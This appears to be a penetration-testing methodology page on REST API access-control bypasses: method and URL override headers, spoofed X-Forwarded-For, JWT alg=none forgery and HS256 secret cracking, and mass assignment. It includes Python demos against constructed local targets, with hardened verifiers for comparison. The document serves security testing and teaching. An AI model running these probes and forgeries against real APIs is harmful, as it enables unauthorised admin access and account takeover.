REST API - Bypasses and Privilege Escalations
REST API security testing
Methodology
Bypassing API filters and ACLs by rewriting HTTP methods and URLs
Some frameworks and reverse proxies let the client override the HTTP method or the requested URL through a header. When the filter or ACL only inspects the request line (e.g. it blocks DELETE, or anything under /admin/), send an allowed method and path and put the real ones in one of these headers. PATCH and /admin/deleteUser are placeholders; header names are case-insensitive in HTTP, but the casing variants are worth trying because some filters match them case-sensitively:
X-HTTP-Method: PATCH
X-HTTP-Method-Override: PATCH
X-Http-Method-Override: PATCH
X-Http-Method: PATCH
X-Method-Override: PATCH
X-Original-Method: PATCH
X-Original-URL: /admin/deleteUser
X-Rewrite-URL: /admin/deleteUser
Access Admin Interface
Admin interfaces that are only allowed from "internal" or whitelisted clients can often be reached by setting the headers the application or its proxy uses to determine the client's IP address or hostname, e.g. X-Forwarded-For, X-Real-IP, X-Forwarded-Host or the Host header itself.
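The two bypasses above (method/URL override headers and spoofed client-IP headers) as one added, runnable example. This is not code from the original page: it stands up a constructed vulnerable API on localhost whose ACL checks only the raw request line and trusts X-Forwarded-For, then probes it with every override/rewrite header pair and with a spoofed internal address. The endpoint paths, the trusted address 10.0.0.5 and the response bodies are assumptions made for the demo.

```python
"""Override/rewrite/trusted-IP bypass probes against a constructed vulnerable API."""
import http.server
import threading
import urllib.error
import urllib.request

# Header names from the list above. urllib normalises header-name case on send,
# so the casing variants (X-Http-Method-Override, ...) collapse into one probe each.
OVERRIDE_HEADERS = ["X-HTTP-Method", "X-HTTP-Method-Override",
                    "X-Method-Override", "X-Original-Method"]
REWRITE_HEADERS = ["X-Original-URL", "X-Rewrite-URL"]
TRUSTED_IPS = {"10.0.0.5"}  # assumed "internal" address the admin ACL trusts


class VulnerableAPI(http.server.BaseHTTPRequestHandler):
    """Constructed target with three flaws: the ACL looks only at the raw request
    line, the app then honours override/rewrite headers, and the client IP is
    read from X-Forwarded-For before the socket address."""
    protocol_version = "HTTP/1.0"

    def log_message(self, *args):  # keep the example quiet
        pass

    def _client_ip(self):
        forwarded = self.headers.get("X-Forwarded-For")
        return forwarded.split(",")[0].strip() if forwarded else self.client_address[0]

    def _reply(self, status, body):
        self.send_response(status)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def _handle(self):
        method, path = self.command, self.path
        # Flaw 1 + 3: ACL on the raw method/path, with "internal" clients exempt.
        if self._client_ip() not in TRUSTED_IPS and (method == "DELETE" or path.startswith("/admin/")):
            return self._reply(403, b"forbidden")
        # Flaw 2: the application layer rewrites method/path from headers.
        for name in OVERRIDE_HEADERS:
            if name in self.headers:
                method = self.headers[name].upper()
                break
        for name in REWRITE_HEADERS:
            if name in self.headers:
                path = self.headers[name]
                break
        if method == "DELETE" and path == "/admin/deleteUser":
            return self._reply(200, b"user deleted")
        if path.startswith("/admin/"):
            return self._reply(200, b"admin panel")
        return self._reply(200, b"ok")

    do_GET = do_POST = do_DELETE = _handle


def send(base, method, path, headers=None):
    """Return (status, body) for one request, including 4xx/5xx responses."""
    data = b"" if method == "POST" else None
    req = urllib.request.Request(base + path, data=data, method=method, headers=headers or {})
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode()


def probe_overrides(base, method="DELETE", target="/admin/deleteUser"):
    """Send an innocuous POST /api/user with every override+rewrite header pair;
    return {(override_header, rewrite_header): (status, body)}."""
    return {(o, r): send(base, "POST", "/api/user", {o: method, r: target})
            for o in OVERRIDE_HEADERS for r in REWRITE_HEADERS}


def probe_trusted_ip(base, path="/admin/", spoof="10.0.0.5"):
    """Claim to be an internal client via X-Forwarded-For."""
    return send(base, "GET", path, {"X-Forwarded-For": spoof})


def start_server():
    srv = http.server.HTTPServer(("127.0.0.1", 0), VulnerableAPI)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d" % srv.server_address[1]


if __name__ == "__main__":
    srv, base = start_server()
    print("direct DELETE /admin/deleteUser:", send(base, "DELETE", "/admin/deleteUser"))
    for pair, result in probe_overrides(base).items():
        print(pair, result)
    print("GET /admin/ with spoofed X-Forwarded-For:", probe_trusted_ip(base))
    srv.shutdown()
```

Against a real target, compare each probe's status and body with the baseline (the direct, blocked request) rather than looking for a fixed string; a 200 with a different body, a different Content-Length or a changed error message is the signal. To test the header-casing variants you need a client that sends header names verbatim (Burp Repeater or a raw socket), since urllib rewrites them.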
JWT Access Token Tampering
JWT Editor: Burp Suite extension
Available in the BApp Store; also explore the advanced JWT header attacks (jwk, jku and kid parameter injection) described at https://portswigger.net/web-security/jwt#jwt-header-parameter-injections
JWT Tool
https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology
Run the playbook scan (-M pb) against an authenticated endpoint, passing the POST body with -pd and the token and content type as extra request headers with -rh:
python3 ./jwt_tool.py -M pb -t http://URL:5001/api/method -pd "{\"propertyId\": 29}" -rh "Authorization: Bearer <TOKEN>" -rh "Content-Type: application/json"
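The core tampering checks that the Burp extension and jwt_tool automate, written out as an added standalone example (not code from the page or from either tool): unverified decoding of the claims, an alg=none forgery, offline guessing of a weak HS256 secret from a wordlist, and re-signing edited claims once the secret is known. The two verifiers are constructed for the demo, one that trusts the alg the token declares and one that pins HS256 server-side; the sample token, its claims and the secret "secret123" are assumptions.

```python
"""JWT tampering primitives: unverified decode, alg=none forgery, HS256 secret
guessing and re-signing, next to a sloppy and a strict verifier."""
import base64
import hashlib
import hmac
import json


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _segment(obj) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def _hs256(signing_input: str, secret: str) -> str:
    return b64url_encode(hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest())


def sign_hs256(header: dict, payload: dict, secret: str) -> str:
    """Mint a token the way a server would (used here only to build the sample)."""
    signing_input = _segment(header) + "." + _segment(payload)
    return signing_input + "." + _hs256(signing_input, secret)


def decode_unverified(token: str):
    """Attacker view: read header and claims without checking the signature."""
    h, p, s = token.split(".")
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p)), s


def forge_alg_none(token: str, changes: dict) -> str:
    """Drop the signature and declare alg=none, keeping the other header fields."""
    header, payload, _ = decode_unverified(token)
    header["alg"] = "none"
    payload.update(changes)
    return _segment(header) + "." + _segment(payload) + "."


def crack_hs256(token: str, wordlist):
    """Offline guess of the HMAC secret; returns the secret or None."""
    signing_input, sig = token.rsplit(".", 1)
    for guess in wordlist:
        if hmac.compare_digest(_hs256(signing_input, guess), sig):
            return guess
    return None


def resign_hs256(token: str, secret: str, changes: dict) -> str:
    """Once the secret is known, edit claims and produce a valid signature."""
    header, payload, _ = decode_unverified(token)
    payload.update(changes)
    return sign_hs256(header, payload, secret)


def weak_verify(token: str, secret: str) -> dict:
    """Constructed sloppy verifier: trusts whatever alg the token declares."""
    header, payload, sig = decode_unverified(token)
    if header.get("alg") == "none":
        return payload
    if header.get("alg") == "HS256" and hmac.compare_digest(_hs256(token.rsplit(".", 1)[0], secret), sig):
        return payload
    raise ValueError("bad signature")


def strict_verify(token: str, secret: str) -> dict:
    """Hardened verifier: the algorithm is fixed server-side, never read from the token."""
    header, payload, sig = decode_unverified(token)
    if header.get("alg") != "HS256":
        raise ValueError("unexpected alg")
    if not hmac.compare_digest(_hs256(token.rsplit(".", 1)[0], secret), sig):
        raise ValueError("bad signature")
    return payload


# Constructed sample: a user token signed with a guessable secret.
SECRET = "secret123"
SAMPLE = sign_hs256({"alg": "HS256", "typ": "JWT"}, {"sub": "alice", "role": "user"}, SECRET)

if __name__ == "__main__":
    print("claims:", decode_unverified(SAMPLE)[1])
    forged = forge_alg_none(SAMPLE, {"role": "admin"})
    print("alg=none accepted by weak verifier:", weak_verify(forged, SECRET))
    found = crack_hs256(SAMPLE, ["password", "admin", "secret123"])
    print("cracked secret:", found)
    print("re-signed token verifies strictly:", strict_verify(resign_hs256(SAMPLE, found, {"role": "admin"}), SECRET))
```

The alg=none forgery is the first thing to try on any endpoint, since it costs one request; secret guessing is offline and only needs one captured token, so run it against a real wordlist before spending requests on the target. The strict verifier is what to recommend in the report: fixed algorithm, constant-time comparison, and no trust in header fields the client controls.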
Mass Assignment
Observe the properties of the objects the API returns and try to set them in create/update requests (also search for hidden parameters with the Param Miner Burp extension). Example: adding an admin flag that the endpoint never exposes as an input:
POST /api/user/create
Host: server
Content-Type: application/json

{ "admin": true }
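The methodology above, as an added example rather than code from the page: a constructed user-creation handler in its vulnerable form (every JSON key is bound onto the model) and its allow-list form, plus the probe a tester runs, which takes the property names observed in a response object, sends each one the normal request does not include, and reports which ones the server accepted. The user model, its field names and the allocated id are assumptions; the observed-key list can be extended with guesses from a parameter wordlist.

```python
"""Mass assignment: a constructed user-creation endpoint in two versions, plus the
probe used to discover which observed properties are silently writable."""
import copy

# Constructed server-side model; "admin" and "verified" are meant to be server-controlled.
DEFAULT_USER = {"id": 0, "username": "", "email": "", "admin": False, "verified": False}
ALLOWED_FIELDS = {"username", "email"}


def create_user_vulnerable(body: dict) -> dict:
    """Binds every JSON key straight onto the model (framework-style auto-binding)."""
    user = copy.deepcopy(DEFAULT_USER)
    user.update(body)   # mass assignment: {"admin": true} lands on the model here
    user["id"] = 42     # assumed server-allocated id, set after binding
    return user


def create_user_safe(body: dict) -> dict:
    """Allow-list binding: only explicitly permitted fields come from the client."""
    user = copy.deepcopy(DEFAULT_USER)
    for key in ALLOWED_FIELDS:
        if key in body:
            user[key] = body[key]
    user["id"] = 42
    return user


def probe_writable(create, observed_keys, base_body):
    """Take the property names seen in a response object (plus any wordlist guesses),
    send each one the normal request omits with a canary value, and return the keys
    whose canary came back unchanged, i.e. the ones the client can set."""
    writable = []
    for key in observed_keys:
        if key in base_body:
            continue
        # Booleans get flipped to True; everything else gets a marker string.
        canary = True if isinstance(DEFAULT_USER.get(key), bool) else "probe"
        result = create({**base_body, key: canary})
        if result.get(key) == canary:
            writable.append(key)
    return sorted(writable)


if __name__ == "__main__":
    normal = {"username": "bob", "email": "bob@example.com"}
    observed = list(create_user_vulnerable(normal).keys())  # what a tester sees in the response
    print("vulnerable endpoint accepts:", probe_writable(create_user_vulnerable, observed, normal))
    print("hardened endpoint accepts:", probe_writable(create_user_safe, observed, normal))
```

Note that the probe does not flag "id" on the vulnerable handler, because the server overwrites it after binding; in a real test that is the same signal you use to tell a property that is merely echoed from one that is actually persisted, so re-read the object with a follow-up GET before reporting.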
API Tester
Vulnerable API Project to practice with